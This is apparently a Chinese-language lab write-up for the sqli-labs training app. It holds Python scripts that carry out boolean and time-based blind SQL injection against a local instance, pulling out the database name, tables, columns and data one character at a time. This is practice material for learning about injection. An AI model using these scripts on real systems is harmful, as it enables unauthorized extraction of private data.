实验环境:
sqli-labs,小皮面板搭建,edge浏览器
Apache:2.4.39, MySQL:5.7, PHP:5.39
Python(pycharm2023):3
less-8
布尔盲注:
1.我这里采用的是最简单的方法：直接用一串字符串来逐个查询
import requests
url = "http://localhost:8080/Less-8/"  # local sqli-labs instance (Less-8)
param = "id"  # query-string parameter the payload is injected into
def getdatabase(url, param):
    """Recover the current database name one character at a time.

    Boolean oracle: the response body contains the marker string only when
    the injected comparison is true. Position ``i`` is resolved by trying
    every candidate in ``chars``; when no candidate matches (the ``for``
    loop's ``else``), the name is assumed to have ended. At most 19
    positions are probed.

    Returns the recovered name (possibly empty).
    """
    database = ""
    # Candidate alphabet; a position whose character is not in it stops the search.
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "
            # The payload is appended to the query string as-is; one request per candidate.
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                database += char
                break
        else:
            # for/else: no candidate matched at position i.
            break
    return database
# 获取表名
def gettable(url, param, database):
    """Recover the comma-joined table list of ``database`` character by character.

    Uses the same marker-string oracle as ``getdatabase``. The subquery is
    ``GROUP_CONCAT(table_name)``, so the string being read is the list of
    table names joined by commas; ``,`` is not in ``chars``, so the search
    stops at the first comma and in practice only the first name is read
    (the author notes this limitation below the listing).

    Returns the recovered string split on ``,`` (always at least one element).
    """
    tables = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "
                       f"FROM information_schema.tables "
                       f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                tables += char
                break
        else:
            # for/else: no candidate matched at position i.
            break
    return tables.split(',')
# 获取列名
def getcolumn(url, param, database, table):
    """Recover the comma-joined column list of ``database.table`` character by character.

    Same oracle and search loop as ``gettable``; the subquery is
    ``GROUP_CONCAT(column_name)`` filtered by both ``table_schema`` and
    ``table_name``. Because ``,`` is not in ``chars`` the search ends at
    the first comma.

    Returns the recovered string split on ``,`` (always at least one element).
    """
    columns = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "
                       f"FROM information_schema.columns WHERE table_schema = '{database}' "
                       f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                columns += char
                break
        else:
            # for/else: no candidate matched at position i.
            break
    return columns.split(',')
# 获取结果
def getresult(url, param, database, table, column):
    """Recover the value of ``column`` in the first row of ``database.table``.

    Same marker-string oracle and per-position search as the helpers above;
    ``LIMIT 1`` restricts the subquery to a single row. ``column``,
    ``database`` and ``table`` are interpolated unquoted into the SQL.

    Returns the recovered value (possibly empty).
    """
    result = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "
                       f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                result += char
                break
        else:
            # for/else: no candidate matched at position i.
            break
    return result
if __name__ == "__main__":
    # Chain: database -> first table -> first column -> first row value.
    database = getdatabase(url, param)
    print(f"Database: {database}")
    tables = gettable(url, param, database)
    print(f"Tables: {tables}")
    # str.split always yields at least one element, so [0] is '' rather than
    # an IndexError when nothing was recovered.
    table = tables[0]
    columns = getcolumn(url, param, database, table)
    print(f"Columns: {columns}")
    column = columns[0]
    result = getresult(url, param, database, table, column)
    print(f"Result: {result}")
tips:我这里没有考虑有多个表和字段的情况,只是简单地把布尔盲注的原理展示了出来。
时间盲注
less-9
时间盲注:
采用时间函数,判断每个字段是否有时间差值(sleep函数)
import requests
import time
def time_based_blind_injection(url, param, payload):
    """Return True when the request for ``payload`` takes more than 5 seconds.

    The timer wraps the whole ``requests.get`` call, so the measured interval
    is wall-clock time including connection setup and transfer, not only the
    server-side delay. NOTE(review): the threshold is a strict ``> 5`` while
    ``get_table``/``get_column``/``get_data`` inject ``SLEEP(5)``, so the
    result depends on overhead as well as on the injected delay; a slow link
    can likewise produce a True result on its own.
    """
    start_time = time.time()
    full_url = f"{url}?{param}={payload}"
    response = requests.get(full_url)
    end_time = time.time()
    if end_time - start_time > 5:
        return True
    return False
def get_database(url, param):
    """Recover the current database name using the timing oracle.

    For each position ``i`` every candidate in ``chars`` is tried; the
    injected ``IF`` sleeps 7 seconds when the character matches, which
    ``time_based_blind_injection`` reports as True. When no candidate
    matches at a position (``for``/``else``) the name is assumed complete.
    Each matched character is printed as it is found.

    Returns the recovered name (possibly empty).
    """
    database = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "
            if time_based_blind_injection(url, param, payload):
                database += char
                print(char)
                break
        else:
            # for/else: no candidate matched at position i.
            break
    print(f"[+] Database name: {database}")
    return database
# 获取表名
def get_table(url, param, database):
    """Recover the name of the first table in ``database`` via the timing oracle.

    ``LIMIT 0,1`` selects only the first row of ``information_schema.tables``
    for the schema, so one table name is read; the commented-out
    ``get_tables`` below sketches the multi-table variant. Matching
    characters trigger ``SLEEP(5)``.

    Returns the recovered name (possibly empty).
    """
    table = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
                       f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
            if time_based_blind_injection(url, param, payload):
                table += char
                print(f"[+] Found character: {char}")
                break
        else:
            # for/else: no candidate matched at position i.
            break
    print(f"[+] Table name: {table}")
    return table
# def get_tables(url, param, database):当表不止一个
# tables = []
# chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
# table_count = 1 # 从第一个表开始
# while True:
# table_name = ""
# for i in range(1, 20):
# for char in chars:
# payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
# f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
# if time_based_blind_injection(url, param, payload):
# table_name += char
# print(f"[+] table: {char}")
# break
# else:
# break
# if table_name:
# print(f"[+] Found table: {table_name}")
# tables.append(table_name)
# table_count += 1
# else:
# break
#
# return tables
# 获取字段名
def get_column(url, param, table):
    """Recover the first column name of ``table`` via the timing oracle.

    The ``information_schema.columns`` lookup filters on ``table_name`` only
    (no ``table_schema`` clause), so a same-named table in another schema
    would satisfy it too; ``LIMIT 0,1`` keeps the first row. Matching
    characters trigger ``SLEEP(5)``.

    Returns the recovered name (possibly empty).
    """
    column = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
            if time_based_blind_injection(url, param, payload):
                column += char
                print(f"[+] column: {char}")
                break
        else:
            # for/else: no candidate matched at position i.
            break
    print(f"[+] Column name: {column}")
    return column
def get_data(url, param, table, column):
    """Recover the value of ``column`` in the first row of ``table`` via the timing oracle.

    ``table`` is interpolated unqualified (no schema prefix), so it resolves
    against whatever database the application's connection is using.
    ``LIMIT 0,1`` restricts the read to one row; matching characters trigger
    ``SLEEP(5)``.

    Returns the recovered value (possibly empty).
    """
    data = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):
        for char in chars:
            payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
            if time_based_blind_injection(url, param, payload):
                data += char
                print(f"[+] Found character: {char}")
                break
        else:
            # for/else: no candidate matched at position i.
            break
    print(f"[+] Data: {data}")
    return data
# 主函数
if __name__ == "__main__":
    target_url = "http://localhost:8080/Less-9/"  # local sqli-labs instance (Less-9)
    param = "id"  # query-string parameter the payload is injected into
    # Each stage runs only if the previous one recovered a non-empty string.
    database = get_database(target_url, param)
    if database:
        table = get_table(target_url, param, database)
        if table:
            column = get_column(target_url, param, table)
            if column:
                get_data(target_url, param, table, column)
同样没有考虑不止一个表或者列的情况